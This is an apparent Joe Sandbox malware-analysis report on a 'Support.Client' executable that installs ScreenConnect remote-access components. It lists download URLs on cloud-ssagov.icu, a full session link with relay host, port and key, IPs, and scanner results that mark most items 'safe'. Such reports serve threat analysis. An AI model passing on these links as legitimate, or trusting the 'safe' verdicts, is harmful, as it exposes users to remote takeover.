                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationg0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlln0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllK0%Avira URL Cloudsafe
                  http://www.w3.a0%Avira URL Cloudsafe
                  http://ocsp.digicert4.0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3p0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Win0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.confige0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationation0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQ0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http00%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4L0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configo0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%40%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe00%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXND0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll30%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e0890%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlz0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-N0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Cli0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationO0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XND0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zz0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationND0%Avira URL Cloudsafe
                  http://cloud-ssagov.icu0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi0%Avira URL Cloudsafe
                  https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    api.wisescreen.net
                    185.49.126.73
                    truefalse
                      unknown
                      cloud-ssagov.icu
                      185.49.126.73
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifestfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.configfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dllfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dllfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Sessionfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dllfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllKdfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designersGdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.edfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/?dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dllndfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/bThedfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.digicert4.dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA940000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.w3.adfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1967265538.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationgdfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                      high
                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Windfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.goodfont.co.krdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3pdfsvc.exe, 00000001.00000002.2548893914.000002CAF4E13000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.typography.netDdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                high
                                                http://www.founder.com.cn/cn/cThedfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/staff/dennis.htmdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
                                                      high
                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configedfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.galapagosdesign.com/DPleasedfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cloud-ssagov.icudfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA607000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQdfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.w3.odfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fonts.comdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sandoll.co.krdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationationScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.urwpp.deDPleasedfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.zhongyicts.com.cndfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4Ldfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2526431199.000002CADA381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2933982070.00000000024AB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sakkal.comdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configodfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6qmgr.db.5.dr, edb.log.5.drfalse
                                                                          high
                                                                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatioScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http0dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManadfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.fontbureau.comdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%4dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnectdfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXNDdfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll3dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsCliedfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.Pdfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e089dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlzdfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-NSupport.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.w3.ordfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA70F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA87A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crl.ver)svchost.exe, 00000005.00000002.2933943783.00000289A7861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://upx.sf.netAmcache.hve.4.drfalse
                                                                                      high
                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.carterandcone.comldfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.Clidfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.edfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNdfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.founder.com.cn/cndfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.com/designers/frere-user.htmldfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationOdfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96edb.log.5.drfalse
                                                                                                high
                                                                                                http://www.jiyu-kobo.co.jp/dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll0.1.drfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designers8dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net4G48BYOD.log.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XNDScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zzdfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crl.vdfsvc.exe, 00000001.00000002.2534096169.000002CAF2ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://cloud-ssagov.icudfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServidfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        185.49.126.73
                                                                                                        api.wisescreen.netUnited Kingdom
                                                                                                        8851EDGEtaGCIComGBfalse
                                                                                                        IP
                                                                                                        127.0.0.1
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1555317
                                                                                                        Start date and time:2024-11-13 18:17:05 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 45s
                                                                                                        Hypervisor based Inspection enabled:false
